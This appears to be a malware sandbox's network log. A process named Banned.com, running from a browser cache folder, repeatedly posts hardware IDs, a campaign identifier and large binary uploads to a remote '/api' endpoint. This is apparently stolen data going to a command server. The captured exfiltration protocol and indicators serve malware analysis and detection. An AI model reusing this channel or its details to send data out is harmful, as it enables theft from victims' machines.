                                                            2024-12-28 20:36:01 UTC12831OUTData Raw: 2d 2d 4c 4d 4e 39 56 52 50 44 50 35 4a 49 5a 52 32 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4c 4d 4e 39 56 52 50 44 50 35 4a 49 5a 52 32 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 4d 4e 39 56 52 50 44 50 35 4a 49 5a 52 32 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d
                                                            Data Ascii: --LMN9VRPDP5JIZR2K4Content-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--LMN9VRPDP5JIZR2K4Content-Disposition: form-data; name="pid"2--LMN9VRPDP5JIZR2K4Content-Disposition: form-data; name="lid"MeHdy4--pl1new1
                                                            2024-12-28 20:36:02 UTC1138INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=miih2nvl56jpd6248k1cto38fu; expires=Wed, 23 Apr 2025 14:22:40 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlJFwdQJJfxopTVCB6ioet6zImDJ1zayDc%2FVmxXnu%2BneXQY%2FnJxzczl2pItQ3ST%2FdvkPxxBDVAKSTEn9AHAItT31hJd%2B19jxjzOhcMDmOYMQoxkvL6H%2Fmpqc4aDWceOTpkdJEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945715bc0f0f59-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1462&rtt_var=580&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13771&delivery_rate=1835323&cwnd=221&unsent_bytes=0&cid=26a810abc597d697&ts=915&x=0"
                                                            2024-12-28 20:36:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549803172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:03 UTC276OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=NXVOOFBV7DO
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 15037
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:03 UTC15037OUTData Raw: 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f
                                                            Data Ascii: --NXVOOFBV7DOContent-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--NXVOOFBV7DOContent-Disposition: form-data; name="pid"2--NXVOOFBV7DOContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--NXVOOFBV7DOCo
                                                            2024-12-28 20:36:04 UTC1143INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=aje3757sqpeqlq1v81clb88i30; expires=Wed, 23 Apr 2025 14:22:43 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2i7aftt0l1iCTW4bgCkVdSjM%2F%2BCL8zq8kPUhtZTY1dvLOZBLWD5Q4hoV3OTIQmML5KOsB%2F9ZauyQMUzh59tiGie9Cy%2BJ%2BDqvx%2FjsOn2%2FofYPDEPyx8KQ%2BTsWyxbRQqTFgqfNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945723f9727d18-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1808&rtt_var=706&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15971&delivery_rate=1520833&cwnd=218&unsent_bytes=0&cid=a795337496cb8c6a&ts=828&x=0"
                                                            2024-12-28 20:36:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549809172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:05 UTC281OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=GO21UPWVTOIT6TU1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 20557
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:05 UTC15331OUTData Raw: 2d 2d 47 4f 32 31 55 50 57 56 54 4f 49 54 36 54 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 47 4f 32 31 55 50 57 56 54 4f 49 54 36 54 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4f 32 31 55 50 57 56 54 4f 49 54 36 54 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d
                                                            Data Ascii: --GO21UPWVTOIT6TU1Content-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--GO21UPWVTOIT6TU1Content-Disposition: form-data; name="pid"3--GO21UPWVTOIT6TU1Content-Disposition: form-data; name="lid"MeHdy4--pl1new1--
                                                            2024-12-28 20:36:05 UTC5226OUTData Raw: 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb
                                                            Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`
                                                            2024-12-28 20:36:06 UTC1137INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=d5c6okj4ej91pm270r9ijh81oa; expires=Wed, 23 Apr 2025 14:22:45 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dt4aVp6vpXH%2BBDacuYSo3ClcM2MeUBRSo5YUD%2Fh2J%2BTLrCd4qofQqCKB1f9u0uSrOoIvHhmPv66drMCZmtmqvWarGHwxE3M7AFD644VK3Hj%2BsqGAIHwTYDgf25iA7enDsE%2By4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9457317b9442ce-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1653&rtt_var=630&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21518&delivery_rate=1722713&cwnd=233&unsent_bytes=0&cid=f595c14f52eb6c1a&ts=989&x=0"
                                                            2024-12-28 20:36:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549815172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:08 UTC277OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=7R2O5KRSM9MP5
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1207
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:08 UTC1207OUTData Raw: 2d 2d 37 52 32 4f 35 4b 52 53 4d 39 4d 50 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 37 52 32 4f 35 4b 52 53 4d 39 4d 50 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 52 32 4f 35 4b 52 53 4d 39 4d 50 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 37 52 32 4f 35 4b 52 53 4d
                                                            Data Ascii: --7R2O5KRSM9MP5Content-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--7R2O5KRSM9MP5Content-Disposition: form-data; name="pid"1--7R2O5KRSM9MP5Content-Disposition: form-data; name="lid"MeHdy4--pl1new1--7R2O5KRSM
                                                            2024-12-28 20:36:08 UTC1140INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=3ared5b1tdk708ksg6b0dom7i5; expires=Wed, 23 Apr 2025 14:22:47 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ey9CzpiMv6mGe8rdgAS4%2By%2B6a6D07s%2BdDZyBcgvrzxK1aVh%2BtCf3BhTmFG9midewpGEvThjaMg804Sr%2F1yzmtvBe%2FAqBt5bXqMhLxLgqWKI%2BfAAjxUqveRfsimI%2BogpY1XFATQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9457406f9b435c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2177&min_rtt=2175&rtt_var=819&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2120&delivery_rate=1332724&cwnd=249&unsent_bytes=0&cid=780199a02de77932&ts=771&x=0"
                                                            2024-12-28 20:36:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549821172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:10 UTC277OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=RI5EHQNV84U
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 587822
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f
                                                            Data Ascii: --RI5EHQNV84UContent-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--RI5EHQNV84UContent-Disposition: form-data; name="pid"1--RI5EHQNV84UContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--RI5EHQNV84UCo
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: c1 48 f7 20 6a 54 7a 20 fc e7 7a ab 08 9e c6 35 ae b7 c0 57 40 0d bb 71 ad 28 25 c9 b8 8c c7 aa e2 2c e5 ea 11 4e b2 20 b9 8a 9d 7f 84 b8 7f 8f 2c 06 7e c0 fa b1 19 e7 5b 30 9a 7b a6 01 03 db da c6 57 30 75 b2 10 68 43 a8 eb c9 7f 17 5f 34 ec e5 00 57 24 33 0e da 5c bb 17 9f 21 16 6f e3 25 5c a4 94 8d 9e 43 fb f1 bd 96 b9 29 9a f6 dd 21 91 d5 6f ae b6 a8 fa 94 e1 92 55 fc ad 41 a7 55 7f 49 97 a5 57 4c 6b 5f bc 0f f4 33 46 72 56 39 38 2e 68 0d 87 72 16 a6 44 99 d6 de 18 4c 75 33 68 ad ee aa 35 e3 ce 44 91 ed 3b 9e 2f 5f 46 91 67 51 5d f1 aa 54 07 f1 9e 44 1d 3e e7 02 53 a3 53 45 f1 ed df 19 bf 64 dd 9e ab e8 c4 fa c3 3e de a8 c6 4d b3 6c 6e f5 fe bc 94 14 0d ce 5a ee 82 51 d4 b1 d8 7b 33 7b db 74 21 ec 9c ff 6b 0d a8 b2 c5 37 11 72 c3 48 2e 50 91 42 dc d5
                                                            Data Ascii: H jTz z5W@q(%,N ,~[0{W0uhC_4W$3\!o%\C)!oUAUIWLk_3FrV98.hrDLu3h5D;/_FgQ]TD>SSEd>MlnZQ{3{t!k7rH.PB
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 5b 60 2e 41 60 d0 bb ad 94 bb 4a 0e 23 ed b3 8a e0 8b fa 30 6a ed c2 11 fb 14 c4 c3 2b cc bd 57 f2 01 44 6e 24 e9 f0 be 57 ea d0 c3 79 1c 2c a2 ed 74 ba 16 62 61 bf ad 65 83 83 eb e6 7f 88 2a 9e d1 30 9f 43 ef 40 91 f5 9f 09 a5 08 e2 f1 93 7e 2c 61 ba 32 f8 e8 49 96 59 2c 2d d9 3e 74 ec 1a ba 38 91 37 2f 04 81 89 78 b9 c8 e7 b1 15 14 47 27 c1 46 1e 70 c1 12 69 d9 9e a4 59 70 a1 35 4b fc de 92 6d e3 b1 9d b6 41 0d e0 11 3f fa 06 01 5c 24 71 98 7e 19 a2 04 0d 98 dd 3e 4e 74 e7 e2 92 8c 99 c2 77 85 f9 b3 85 17 6e 2a e0 7a 94 1b 8d 07 35 dc b9 39 21 95 b3 8f 85 1c 7e 4f 24 5e 54 04 87 50 91 c5 57 f1 43 a4 e5 cc b7 0b 3d f5 ec d2 6a c6 70 c8 50 b4 90 d1 f8 de b3 4f 07 45 f9 dd 45 c1 f9 f2 a1 1d 37 6d f7 7c 0e 9f 52 76 67 a2 72 a0 0c 00 de 8b db 59 b7 65 52 1d
                                                            Data Ascii: [`.A`J#0j+WDn$Wy,tbae*0C@~,a2IY,->t87/xG'FpiYp5KmA?\$q~>Ntwn*z59!~O$^TPWC=jpPOEE7m|RvgrYeR
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 7d 4f 7c 89 7d 75 f9 09 e8 24 e1 8c b4 52 cf 54 4f 71 3e 56 b5 aa 80 d1 58 a5 26 3f ae fb 5b a4 cf fe 8c 3b 7c e2 3a f7 ed cf d1 d6 1d 1e 00 83 53 1c 22 c9 22 4a 8b a1 be 67 e8 ee c7 01 8a 8e 5c d0 bb 4a b9 64 00 ac b4 5a 82 c3 e1 91 b2 5b c7 bb ed 20 99 4d 91 ff 5a 69 f6 61 fa c1 ed 2b 42 2c 51 b0 24 0f 6c 5c 33 0c 97 f3 66 93 09 29 6d 38 d3 6c 7c fb ef 02 26 3e 91 99 53 dc f1 34 c0 fe 86 bf fd 60 a8 a4 c0 27 44 6a bb c7 63 7d a9 7f bf c4 c4 06 ad e4 5f 1a 79 8c 52 22 4c 04 b6 ae 78 d3 0c 55 3a ea 8d a2 aa ec 3d b5 86 23 8a f8 fe f4 95 20 92 9e 97 be b4 f9 bb 32 66 b0 d6 bd d3 43 19 f3 66 a1 bd 29 b2 64 fd 99 a5 83 d5 43 55 b8 f6 32 c4 37 a9 bc c0 9b 7b a1 59 69 54 f1 75 1d fc 0e 3c 42 56 3b c9 8c f6 6e 17 0d 92 13 84 ba 00 1d df 58 fa fb d5 e5 c5 e2 33
                                                            Data Ascii: }O|}u$RTOq>VX&?[;|:S""Jg\JdZ[ MZia+B,Q$l\3f)m8l|&>S4`'Djc}_yR"LxU:=# 2fCf)dCU27{YiTu<BV;nX3
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: eb a7 87 c7 2e 28 44 cb 4a f2 19 ef 06 6f ba 44 70 c9 e4 f6 1f 0b e2 ee 99 bc 34 e8 cb a5 59 e1 46 13 b3 4c 23 55 fa 0f 0b 42 bf 80 bc e7 9f 2f 3a 27 8f 11 76 3c 25 5c 75 9f da 75 5e 26 47 bd 01 1e e0 8f 58 32 51 57 3a 9b ea e1 14 5d 1a df 48 f9 7a 9d 05 59 fa b9 23 c7 0f 52 d4 54 41 ee 6b a8 18 60 70 1b 3f 32 4a 98 35 3e 89 3a e0 12 34 2a d4 90 bf 59 04 24 15 c1 b6 b9 4d aa 32 2f a9 90 81 46 26 fe 65 18 1e 40 35 9a 8c f7 3c ab 51 f0 92 7e 07 d3 82 43 3d 21 c0 43 81 ac 48 83 70 20 68 8d 13 ba 02 48 fc f6 29 e0 f2 6c 40 7b 1e 43 fa 1f b5 c9 00 20 f4 06 44 f1 00 7b 10 06 f0 ad 90 be c3 3e b4 7e 01 c0 cf 91 67 1b 4d 3e 90 07 dd 28 c2 83 e5 5b 68 e0 f1 9a 0a 27 67 f1 d1 d1 40 2d 51 40 5a 1f b8 81 0e d3 b8 b6 01 9d 01 a1 d6 50 24 b2 f8 76 32 ba b1 6b e2 b7 fd
                                                            Data Ascii: .(DJoDp4YFL#UB/:'v<%\uu^&GX2QW:]HzY#RTAk`p?2J5>:4*Y$M2/F&e@5<Q~C=!CHp hH)l@{C D{>~gM>([h'g@-Q@ZP$v2k
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: f4 d7 2c b0 36 a5 96 15 10 0b f2 d1 3c 11 08 ac 5e 90 ff 6b 17 28 26 15 34 69 c8 c6 d0 2a c8 48 fa db 81 57 c4 82 e5 db 80 61 6a ca fc b8 fe 49 5e 12 48 bf 07 4f e4 38 77 4c 19 de 1f cf 47 6f 2e bd c4 bd a0 38 b3 15 6d f0 88 25 73 9b d3 c0 70 2e d3 2e d8 c5 eb 4b bc 7d 95 ff fb e8 a1 e6 0b e2 e0 a7 b4 73 22 aa 2f 44 fb b9 77 f5 5f f8 6e e1 e6 b5 bd 68 f8 7d 68 d4 ce e2 5a a7 4a d2 a8 c9 e0 b4 90 38 6a 43 9a ea b7 7a 3e 5e 05 ca 4c e4 5d 58 c3 b5 65 fb 39 b3 d2 28 7f e5 c6 3d 8e 59 b2 d6 16 e3 4b e2 eb 04 13 96 d4 85 4e f9 29 93 a8 a4 de e8 a1 55 f4 fc 31 97 1a 03 b1 02 c7 69 d3 b5 94 27 bf 65 12 d6 6e 94 a7 c0 e4 81 a9 5d 78 7d cf 92 60 f0 97 80 f0 9a ad 21 d3 1b 87 fa 51 d2 a1 74 45 45 1d d5 2e 40 8d 8b 96 5c ed e8 b1 40 36 7a 7c 5b 63 c4 d1 28 66 ec ad
                                                            Data Ascii: ,6<^k(&4i*HWajI^HO8wLGo.8m%sp..K}s"/Dw_nh}hZJ8jCz>^L]Xe9(=YKN)U1i'en]x}`!QtEE.@\@6z|[c(f
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 79 1f b5 6f f6 58 17 fd c8 e6 eb bf fe 04 a1 99 ea 27 3b 77 2d f1 02 4a 55 9e d5 de 5d df 03 ce ec c2 03 cb 09 0b d0 64 ec 20 c7 2e 69 31 69 81 7e 36 e5 d7 91 c5 04 74 6c 95 9d d3 03 57 17 1e 15 52 13 21 0f 49 3d 0c d6 7c d6 54 41 ed c8 1f 9c 02 4d 10 74 70 e3 cd 88 1a d8 42 90 4c 12 f3 e7 5f 42 60 1c b1 f8 93 4a e1 23 d8 46 6e fe c7 b0 58 e0 da fb 77 62 0e 43 84 6d 18 49 3d b7 af e6 8a c4 7e 56 86 c3 bf 5a 10 29 3d 52 74 52 70 d4 c6 96 94 21 27 33 26 87 0d c7 d0 e4 a7 7e df a5 24 ae ed 21 8e ea 63 6f c9 63 6f da 49 9b 6d 9e c3 b6 cd 6c 61 8f 9c 4d 0f 2e 94 83 67 7a c2 67 7a 22 03 56 af 61 64 3d 08 00 12 28 ec 12 88 09 0e 61 a9 0e b9 4c aa 7f d0 19 3f 7a e6 da 96 7d b0 12 53 89 aa 6c 0f 4b 0d ef 9e 28 7a 41 0a d8 f8 23 9f a9 52 5d 5f 44 18 92 1d df ce ac
                                                            Data Ascii: yoX';w-JU]d .i1i~6tlWR!I=|TAMtpBL_B`J#FnXwbCmI=~VZ)=RtRp!'3&~$!cocoImlaM.gzgz"Vad=(aL?z}SlK(zA#R]_D
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 55 20 10 af 92 0e af ca 4d 2d 1f ab 1a 34 23 a7 6f c9 29 c2 c4 3f c7 1c 72 61 ec 06 39 3a 18 af 42 bc 63 54 22 73 cf e8 e3 88 83 07 e2 93 c7 3f 74 a1 c0 ce 9f 50 42 f9 ec 2d 5d 03 6d ff 2b 26 b8 64 d2 93 11 e6 5d b6 4c bf 71 a9 06 e5 d7 ec a7 e3 95 1e 2d c6 bd e8 bf e6 5e 0e d5 6c 63 d3 e4 44 59 26 53 01 cb 81 87 b7 89 b5 de 0c fb 54 13 5e 49 bb 35 38 72 34 38 3f 01 23 03 ff 79 1f 3e eb 2c 2a cb 11 63 69 cd ba e6 36 d9 f2 47 3e b9 dc 23 58 29 82 dc 0d ab bd 3f d1 da e5 63 e5 62 d2 44 ef 60 96 4e 6d 49 ca 59 34 43 9f e4 e8 2b 71 45 69 16 8a fd c6 eb 0b f7 96 45 87 7c d3 0d 72 37 98 03 ec f0 70 3b c6 de 4e 6d b4 af c3 76 d2 00 a0 70 5b d1 eb bb 14 e3 4d 7e 79 8e d5 6b 70 22 21 b0 e0 0f fe 03 ff 41 4f 4d 55 8c f3 40 84 45 75 fe 5a cb c9 67 ba a4 1b 0a 99 bd
